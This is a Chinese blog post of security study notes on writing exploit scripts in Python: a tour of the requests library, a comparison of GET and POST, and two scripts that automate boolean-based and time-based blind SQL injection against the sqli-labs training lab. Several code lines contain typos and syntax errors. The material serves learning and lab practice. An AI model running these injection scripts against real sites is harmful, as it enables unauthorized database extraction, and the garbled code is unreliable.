网络安全笔记-POC与EXP的Python实现

最新推荐文章于 2023-11-01 19:10:53 发布
最新推荐文章于 2023-11-01 19:10:53 发布
阅读量755 收藏 5
点赞数
分类专栏: 网络安全笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L120305q/article/details/126556225
版权

定制EXP漏洞利用之Python实现

以Web漏洞为主
基础知识:
requests模块
requests模块详解
requests是使用Apache2 licensed许可证的HTTP库。
用python编写。
比urllib2模块更简洁。
Request支特HTTP连接保持和连接池,支持使用cookie保持会话,支持文件上传,支持自动响应内容的编码,支持国际化的URL和POST数据自动编码。
内置模块的基础上进行了高度的封装,从而使得python进行网络请求时,变得人性化,使用Requests可以轻而易举的完成浏览器可有的任何操作。
现代,国际化,友好。
requests会自动实现持久连接keep-alive。
基本语法

import requests
res = requests.get("your url");
//获取响应正文
res.text
//获取响应状态码
res.status_code
//获取响应编码
res.encoding
//以二进制方式获取响应正文
res.content
//获取响应头部
res.headers
//获取提交的url
res.url
//获取发送到服务器的头信息
res.request.headers

相关操作

定制头部
1、重新定义User-Agent

import requests
url="http://172.16.132.138/php/test.php"
header = {"User-Agent":"AJEST"}
res = requests.get(url=url;headers=header)
print(res.request.headers)

2、超时

import requests
url="http://172.16.132.138/php/test.php"
try:	
	res = requests.get(url=url;timeout=2)
	print(res.text)
except Exception as e:
	print("TimeOut!")

3、get传参

import requests
url = "http://10.10.10.131/cpde/PHP/test/get.php"
getPara = {"name":"AJEST","pwd":"123456"}
res = requests.get(url = url,params = getPara)
print(res.text)
print(res.url)

4、post传参

url = "http://10.10.10.131/cpde/PHP/test/post.php"
postData = {"name":"agest","pwd":"123456"}
res = requests.post(url = url,data = postData)
print(res.text)

5、上传文件

url = "http://172.16.132.138/php/upload/index.php"
upFile = {"up":open("info.php","rb")}
res = requests.post(url = url,files = upFile)
print(res.text)

6、重定向

url = "http://172.16.132.138/php/redirect/index.php"

res = requests.get(url = url)
print(res.text)
print(res.history)

res = requests.get(url =url,allow_redirects = False)
print(res.headers)
print(res.text)

7、cookie

url = "http://172.16.132.138/php/cookie/index.php"
coo = {"name":"ajest"}
res = requests.get(url = url,cookies = coo)
print(res.text)

GET和POST区别

HTTP协议中的两种发送请求的方法,本质上都是在进行TCP连接.

  • GET请求和POST请求的区别是什么?
    • get请求一般是去取获取数据(其实也可以提交,但常见的是获取数据);
      post请求一般是去提交数据。
    • GET请求参数是通过URL进行传递的,所以隐私性,安全性较差,请求的数据长度是有限制的,不同的浏览器和服务器不同,一般限制在 2~8K 之间,更加常见的是 1k 以内;
      POST请求的参数包含在请求体body当中。post请求是没有的长度限制。
    • GET请求比POST请求更不安全,因为参数直接暴露在URL中,所以,GET请求不能用来传递敏感信息。
    • GET请求参数会完整的保留在浏览器的历史记录中,POST请求的参数不会保留。
    • GET请求进行url编码(百分号编码),POST请求支持多种编码方式。
    • GET请求产生的URL地址是可以被bookmark(添加书签)的,POST请求不可以。
    • GET请求在浏览器回退的时候是无害的,POST请求会.再次提交数据。
    • GET请求在浏览器中可以被主动cache(缓存),而POST请求不会被缓存,可以手动设置。
    • get请求会被保存在浏览器历史记录当中,post不会。get请求可以被收藏为书签,因为参数就是url中,但post不能。它的参数不在url中。
    • get请求只能进行url编码(appliacation-x-www-form-urlencoded),post请求支持多种(multipart/form-data等)。
  • 深入区别
    GET产生一个TCP数据包。POST产生两个TCP数据包。
    复杂的说
    对于GET请求,浏览器会把http header和data一起发送出去,服务器响应200,请求成功。
    对于POST请求,浏览器先发送header,服务器会响应100(已经收到请求的第一部分,正在等待其余部分),浏览器再次发送data,服务器返回200,请求成功。
    • 2、既然POST请求需要两步,那么时间上的消耗会不会比GET请求更多?不会。
      GET请求和POST请求都有自己的语义,不能随便混用。
      在网络环境好的情况下,发送一次包的时间和发送两次包的时间差可以忽略,在网络环境差的情况下,发送两次包的TCP在验证数据的完整性上,有非常大的优势。
      并不是所有的浏览器都会在POST请求中发送两次包。比如:火狐。

python实现SQL注入

import requests
url = "http://10.10.10.131/sqli-labs-master/Less-8/"
normalHtmlLen = len (requests.get (url=url+"?id=1").text)
print ("The len of HTML: "+str (norma1HtmlLen))
dbNameLen = 0
while True:
	dbNameLen_url = url+"?id=1'+and+length (database ()) ="+str (dbNameLen) +"--+"
	print (dbNameLen_url)
	if len (requests.get (dbName Len_url).text) == normalHtmlLen:
		print ("The len of dbName: "+str (dbNameLen)) 
		break
	if dbNameLen == 30: 
		print ("Error!") 
		break
	dbName Len +=1

dbName = ""
for i in range (1, 9) :
	for a in string.ascii_lowercase:
		dbName_url = url+"?id=1'+and+substr (database (), "+str (i) +", 1) =' "+a+"'--+"
		print (dbName_url)
		if len (requests.get(dbName_url). text)normalHtmlLen: 
			dbName += a
			print (dbName) 
			break

import requests 
import string
url = "http://10.10.10.131/sqli-labs-master/Less-9/" 
def timeOut (url) :
	try:
		res = requests.get (url, timeout=3)
		return res.text
	except Exception as e:
		return "timeout"
dbNameLen = 0
while True:
	dbNameLen +=1
	dbNameLenUrl = url+"?id=1'+and+if (length (database ()) ="+str (dbNameLen) +", sleep (5) , 1) --+"
	#print (dbNameLenUrl)
	if "timeout" in timeOut (dbNameLenUrl):
		print ("The Len of dbName: "+str (dbNameLen)) break
	if dbNameLen == 30: 
		print ("Error!") 
		break

dbName = ""
for i in range (1, dbNameLen+1) :
	for char in string. ascii_lowercase:
		dbNameUrl = url+"?id=1'+and+if (substr (database (), "+str (i) +", 1) =' "+char+"', sleep (5) , 1) --+"
		print (dbNameUrl)
		if "timeout" in timeOut (dbNameUrl) :
			dbName +=char
			print ("The dbName:"+dbName) 
			break
二手卡西欧
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PoC-Bank:专注于网络安全| PoC和漏洞利用的集合
05-03
中国人民银行 专注于网络安全。 收集一些PoC和漏洞利用
sql注入pythonpoc_分享使用python编写poc,exp的实例教程
weixin_39592789的博客
12-17 465
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐没有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋pocexp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
Python----POCEXPrequests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2233
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
网络安全POC编写流程
qq_37119462的博客
06-19 1886
针对一个已经公开的漏洞,POC的编写流程是这样的: 根据漏洞的详情,寻找指定受影响的版本程序 可以去官网下载历史版本程序 有些漏洞作者不会提具体版本号,那你就要根据漏洞作者提交的时间来判断了。当然除了官方网站之外,还可以去 github 上寻找源码,这些个官网都喜欢把历史版本的程序删除掉,善用 github 上的 tag, branch, release 功能,上面有你要的所有版本。 搭建对应漏洞的靶场环境 根据漏洞详情,手动将整个流程走一遍,熟悉下复现条件,比如使用 GET 还是 POST 请求,需不
网络安全中的POCEXP、Payload、ShellCode
日拱一卒,功不唐捐
09-18 8479
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
Some-PoC-oR-ExP:各种漏洞pocExp的收集或编写
04-28
各种漏洞PoCExP的收集或编写 个人偶尔整理收集,仅为安全研究提供参考~ 请勿用于实施违法行为,如由您使用不当引起的法律⻛险,由您⾃主承担~ 一些POC来源
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
Some-PoC-oR-ExP(各种漏洞pocExp的收集或编写)-20210715.zip
08-05
Some-PoC-oR-ExP(各种漏洞pocExp的收集或编写)
GUI-POC-EXP:随便写
03-03
专用于制作GUI工具而创建的项目... 其他EXPPOC可投递至至上方邮箱,随缘更新GUI工具... 投稿地址:
Pocsuite-poc-exp:分享一些自己写的pocexp
05-17
Pocsuite-poc-exp分享一些自己写的poc/exp
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
网络安全】Bash漏洞原理POC及ShellCode
Walter的专栏
09-26 4495
从昨天开始,这个从澳大利亚远渡重洋而来的BASH远程命令执行漏洞就沸腾了整个FreeBuf,大家都在谈论,“互联网的心脏又出血了”,可是,亲,到底怎么对网站进行测试?下面这段脚本 $ env x=‘() { :;}; echo vulnerable'  bash -c "echo this is a test" 真的如各路大神们说的这样吗? 它与“心脏出血”漏洞不同,“心脏出血
网络安全中的POCEXP、Payload、ShellCode_网络安全payload是什么意思
qq_44005305的博客
10-12 725
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
简单的Poc Exp编写(上)
dfdhxb995397的博客
05-26 1044
简单的POC EXP编写(上) 作者BY Greekn 今天主要讲的是关于web方面的poc编写 关于web安全个人理解的话 一个就是攻击另一个就是漏洞挖掘了防御的话看自己的经验了 攻击的话不管自己黑的漫天飞也是利用别人的工具或者漏洞罢了 这样只会攻击的话我们是学不会指哪打哪的所以我们就需要掌握漏洞...
网络安全基础
最新发布
qq_63484934的博客
11-01 70
注入攻击最常见的形式,主要是指Web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询或其他操作,导致数据库信息泄露或非授权操作数据表。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过对方系统存在的安全漏洞获得系统的root或system权限。通过网络进行的入侵行为。
Python制作vsftpd2.3.4的exppoc
xiaobaihack_doge的博客
02-11 303
Python是一门优秀的脚本语言,目前在网络安全领域被广泛使用,一些exp(漏洞利用程序)程序都是由Python做的,本次我们将用Python写一个exppoc(漏洞验证程序)。关于vsftpd2.3.4程序,这是一个在Linux上的ftp软件,允许其他设备通过ftp连接,但是这个软件存在一个高危漏洞,当用户名或密码含有:)字样时,会在本机开启一个提供shell的6200端口,因此被称为"笑脸漏洞”。exploit-db上的exp
网络安全 payload、shellcode、exppoc 详解
热门推荐
普通Gopher
10-06 1万+
在学习网络安全的过程中经常会听到几个名词,例如 payload、shellcode、exppoc等 碰见不懂的东西就要去搞懂,于是动手查了查资料 Payload是什么? 是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 对于一个漏洞,他可以被利用(exploit),利用有一个完整的解决方案你可以把这个看作是名词的(exploit),然后利用必然有目的,而你的目的...
学习网安需要了解的一些基础知识
fencecat的博客
02-26 2904
很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的方法。一种无需依托任何黑客软件,更注重研究人性弱点的黑客手法正在兴起,这就是社会工程学黑客技术。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
vue-sqleditor-poc
09-09
vue-sqleditor-poc 是一个基于 Vue.js 开发的 SQL 编辑器的示例项目。 在这个项目中,使用了 Vue.js 框架来构建用户界面,并使用了这个框架提供的响应式数据绑定、组件化等特性来实现一个功能完善的 SQL 编辑器。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值